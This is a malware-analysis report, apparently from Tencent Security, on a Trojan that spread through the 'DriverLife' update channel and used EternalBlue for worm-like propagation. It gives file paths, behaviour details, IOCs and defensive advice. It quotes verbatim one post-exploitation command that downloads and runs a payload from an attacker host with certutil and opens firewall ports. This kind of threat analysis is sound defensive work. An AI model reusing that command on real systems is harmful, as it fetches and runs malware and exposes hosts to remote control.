How the “DriverLife” Trojan Leverages EternalBlue for Rapid Worm‑Like Spread

Overview

On the afternoon of December 14, Tencent Security Threat Intelligence Center detected a surge of a Trojan distributed via the "DriverLife" update channel that also leveraged the high‑severity EternalBlue vulnerability. Within two hours, the malware affected up to 100,000 users, posing a severe threat to enterprise networks.

The Trojan spreads worm‑like across internal networks and subsequently downloads a cloud‑controlled payload, representing a significant information security risk for corporate users.

Detailed Analysis

The malicious executable

dtlupg.exe

contacts the following URLs to download the payload (characters have been partially obfuscated to prevent direct downloads):

hxxp://xxxx.update.ackng.com/ziptool/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe

hxxp://xxxx.update.ackng.com/calendar/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe

The payload is written to locations such as

C:\Program Files (x86)\DTLSoft\iliUpdater\ctrl\f79cb9d2893b254cc75dfb7f3e454a69.exe

and later extracts

C:\WINDOWS\Temp\svvhost.exe

(MD5: 2E9710A4B9CBA3CD11E977AF87570E3B). The

svvhost.exe

contains EternalBlue exploit tools for further internal and external propagation.

2.1 Virus Mother

The file

F79CB9D2893B254CC75DFB7F3E454A69.exe

copies itself to

C:\Windows\System32\svhost.exe

, installs as a service named

Ddiver

, and launches cloud‑control module

svhhost.exe

and attack module

svvhost.exe

. It checks a mutex to avoid reinfection.

2.2 Mining

The cloud‑control Trojan

svhhost.exe

reads encrypted shellcode from a shared memory segment named

HSKALWOEDJSLALQEOD

every 2000 seconds, decrypts it, and executes it. The current shellcode primarily performs cryptocurrency mining, but future updates could fetch more malicious payloads such as ransomware.

2.3 Attack Module

The attack module downloads

eb.exez

from

hxxp://dl.haqo.net/eb.exez

and runs it as

Svvhost.exe

. Analysis shows it is a Python‑based compressed package of the EternalBlue exploit. The module also includes

Mysmb.pyo

for scanning internal networks on port 445 and attempts to compromise both internal and external IPs, pausing 20 minutes after each attack.

Successful exploitation executes the following command on compromised hosts to download and run additional payloads and open firewall ports:

cmd.exe /c certutil -urlcache -split -f http://dl.haqo.net/dl.exe c:/install.exe&c:/install.exe&netsh firewall add portopening tcp 65531 DNS&netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53

Security Recommendations

1. Temporarily close unnecessary ports on servers (e.g., 135, 139, 445). 2. After the weekend, corporate users should run Tencent's threat‑detection tool to clean infections and apply vulnerability patches via the built‑in patch‑repair function. 3. Enforce strong passwords and avoid weak credentials. 4. Deploy reputable antivirus solutions to block potential attacks. 5. Consider deploying Tencent's advanced threat detection system, which leverages cloud and endpoint data for comprehensive threat intelligence.

IOCs

Domains i.haqo.net dl.haqo.net

MD5 hashes 2e9710a4b9cba3cd11e977af87570e3b 74e2a43b2b7c6e258b3a3fc2516c1235 f79cb9d2893b254cc75dfb7f3e454a69

URLs

hxxp://dl.haqo.net/eb.exez

hxxp://i.haqo.net/i.png?ID=xxxxx